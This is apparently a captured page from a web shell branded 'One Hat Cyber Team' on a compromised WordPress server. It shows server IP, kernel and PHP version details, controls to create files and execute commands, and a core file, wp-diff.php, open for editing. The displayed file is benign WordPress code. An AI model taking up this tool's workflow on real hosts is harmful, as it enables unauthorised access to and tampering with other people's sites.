One Hat Cyber Team
Your IP :
18.226.170.19
Server IP :
130.211.160.56
Server :
Linux pod-100217:apache2_82:v0.5.7 5.4.0-1102-gcp #111~18.04.2-Ubuntu SMP Tue Mar 21 16:15:46 UTC 2023 x86_64
Server Software :
Apache
PHP Version :
8.2.26
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
nas
/
content
/
live
/
wkhjackfruit
/
wp-includes
/
Edit Nama File:
wp-diff.php
<?php /** * WordPress Diff bastard child of old MediaWiki Diff Formatter. * * Basically all that remains is the table structure and some method names. * * @package WordPress * @subpackage Diff */ if ( ! class_exists( 'Text_Diff', false ) ) { /** Text_Diff class */ require ABSPATH . WPINC . '/Text/Diff.php'; /** Text_Diff_Renderer class */ require ABSPATH . WPINC . '/Text/Diff/Renderer.php'; /** Text_Diff_Renderer_inline class */ require ABSPATH . WPINC . '/Text/Diff/Renderer/inline.php'; /** Text_Exception class */ require ABSPATH . WPINC . '/Text/Exception.php'; } require ABSPATH . WPINC . '/class-wp-text-diff-renderer-table.php'; require ABSPATH . WPINC . '/class-wp-text-diff-renderer-inline.php';
Simpan